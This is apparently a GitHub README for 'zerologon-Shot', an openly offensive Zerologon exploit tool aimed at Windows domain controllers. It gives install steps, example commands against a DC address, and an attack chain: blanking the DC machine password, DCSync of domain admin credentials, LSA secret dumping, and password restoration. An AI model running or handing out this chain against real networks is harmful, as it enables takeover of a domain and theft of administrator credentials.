Skip to content

Zerologon exploit with restore DC password automatically

Notifications You must be signed in to change notification settings

XiaoliChan/zerologon-Shot

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

18 Commits
 
 
 
 
 
 

Repository files navigation

zerologon-Shot

Zerologon exploit with restore DC password automatically

Table of Contents

  1. Getting Started
  2. Usage
  3. Screenshots
  4. How it works?
  5. Disclaimer
  6. References

Getting Started

Installation

Only need latest version of Impacket

  1. Clone the impacket repository
    git clone https://github.com/fortra/impacket
  2. Install imapcket
    cd imapcket && sudo pip3 install .
  3. Enjoy it :)
    git clone https://github.com/XiaoliChan/zerologon-Shot.git

(back to top)

Usage

python3 zerologon-Shot.py ip_addr

or

python3 zerologon-Shot.py domain/'dc_name$'@ip_addr

E.g.
python3 zerologon-Shot.py 192.168.85.210
python3 zerologon-Shot.py xiaoli-2008.com/'WIN-D6SJTQG7I0K$'@192.168.85.210
python3 zerologon-Shot.py xiaoli-2008.com/'WIN-D6SJTQG7I0K$'@192.168.85.210 -dc-ip 192.168.85.210

(back to top)

Screenshots

  • Enter to win!!!

image

image

image

(back to top)

How it works?

  • First: Enumerate host info via ldap (get hostname & domain)
  • Second: use zerologon exploit to attack DC (after the exploit is finished, the DC password now is cleared).
  • Third: authenticate into LDAP with DC computer account (password is blank) to get domain admins.
  • Fourth: retrieve all domain admins credentials with dcsync.
  • Fifth: use the domain admin's credential to retrieve DC LSA secrets to get "plain_password_hex".
  • Last: restore DC password with "plain_password_hex" by domain admin.

(back to top)

Disclaimer

The spirit of this Open Source initiative is to help security researchers, and the community, speed up research and educational activities related to the implementation of networking protocols and stacks.

The information in this repository is for research and educational purposes and not meant to be used in production environments and/or as part of commercial products.

If you desire to use this code or some part of it for your own uses, we recommend applying proper security development life cycle and secure coding practices, as well as generate and track the respective indicators of compromise according to your needs.

(back to top)

References

(back to top)

About

Zerologon exploit with restore DC password automatically

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages